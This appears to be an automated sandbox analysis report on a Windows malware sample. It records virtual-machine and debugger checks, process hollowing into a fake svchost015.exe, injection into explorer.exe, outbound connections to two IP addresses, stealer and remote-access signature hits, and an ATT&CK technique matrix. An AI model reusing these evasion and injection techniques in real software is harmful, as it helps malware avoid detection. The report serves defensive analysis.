              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
              Source: C:\Users\user\AppData\Roaming\birajciAPI/Special instruction interceptor: Address: 7FFDB442E814
              Source: C:\Users\user\AppData\Roaming\birajciAPI/Special instruction interceptor: Address: 7FFDB442D584
              Source: oZB7n3wuNk.exe, 00000000.00000002.2178960201.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 440Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1199Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 786Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 357Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3543Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 431Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 410Jump to behavior
              Source: C:\Windows\explorer.exe TID: 3796Thread sleep count: 440 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2404Thread sleep count: 1199 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2404Thread sleep time: -119900s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 5960Thread sleep count: 786 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 5960Thread sleep time: -78600s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 4876Thread sleep count: 278 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6124Thread sleep count: 342 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6124Thread sleep time: -34200s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6704Thread sleep count: 357 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6704Thread sleep time: -35700s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 2404Thread sleep count: 3543 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2404Thread sleep time: -354300s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000:
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drBinary or memory string: ParallelsVirtualMachine
              Source: explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
              Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
              Source: explorer.exe, 0000000C.00000003.3138931305.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: 9A25.exe, 00000006.00000000.2736083292.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 9A25.exe.2.drBinary or memory string: QEMUU
              Source: explorer.exe, 0000000C.00000002.3368337522.000000000B983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00pi
              Source: explorer.exe, 00000002.00000000.2159354736.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.2163021353.000000000978C000.00000004.00000001.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137154672.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3140422641.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 0000000C.00000002.3368337522.000000000B92D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\e\
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BB14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: explorer.exe, 0000000C.00000002.3361492931.0000000008CEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}O
              Source: explorer.exe, 0000000C.00000003.3133714532.0000000008A80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =C:Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterOFILE=user-PC
              Source: explorer.exe, 0000000C.00000002.3361492931.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
              Source: explorer.exe, 0000000C.00000003.3171889698.000000000B9A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
              Source: explorer.exe, 0000000C.00000003.3194823909.000000000BABF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000\03
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drBinary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: explorer.exe, 0000000C.00000003.3194823909.000000000BA45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:2
              Source: explorer.exe, 0000000C.00000002.3359137352.0000000007C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
              Source: explorer.exe, 0000000C.00000002.3368337522.000000000B983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}G|k
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:1
              Source: explorer.exe, 00000002.00000000.2159354736.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
              Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: explorer.exe, 0000000C.00000003.3199415685.000000000BA11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
              Source: explorer.exe, 0000000C.00000003.3194823909.000000000BA45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
              Source: explorer.exe, 0000000C.00000003.3194823909.000000000B96A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00s
              Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000C.00000002.3352828466.0000000001035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.2159354736.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: 9A25.exe, 00000006.00000003.2789038748.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, 9A25.exe, 00000006.00000002.2790089994.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V m
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064A545 push dword ptr fs:[00000030h]0_2_0064A545
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A092B mov eax, dword ptr fs:[00000030h]0_2_007A092B
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A0D90 mov eax, dword ptr fs:[00000030h]0_2_007A0D90
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_0067092B mov eax, dword ptr fs:[00000030h]4_2_0067092B
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00670D90 mov eax, dword ptr fs:[00000030h]4_2_00670D90
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_006FA0BD push dword ptr fs:[00000030h]4_2_006FA0BD
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: birajci.2.drJump to dropped file
              Source: C:\Windows\explorer.exeNetwork Connect: 84.32.84.152 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 2.185.214.11 80Jump to behavior
              Source: Yara matchFile source: Process Memory Space: 9A25.exe PID: 3500, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeCode function: 6_2_0301A090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_0301A090
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeThread created: C:\Windows\explorer.exe EIP: 86719B0Jump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciThread created: unknown EIP: 2F219B0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exeJump to behavior
              Source: explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
              Source: explorer.exe, 00000002.00000000.2160436638.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3358992116.0000000005190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3358992116.0000000005190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 0000000C.00000002.3357740513.0000000005079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman[f^
              Source: explorer.exe, 0000000C.00000002.3352828466.0000000001017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
              Source: explorer.exe, 00000002.00000000.2159354736.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
              Source: explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeQueries volume information: C:\ VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 6812, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 6812, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation
              1
              DLL Side-Loading
              812
              Process Injection
              11
              Masquerading
              OS Credential Dumping631
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Shared Modules
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              24
              Virtualization/Sandbox Evasion
              LSASS Memory24
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager3
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook812
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture115
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information
              Cached Domain Credentials113
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              File Deletion
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
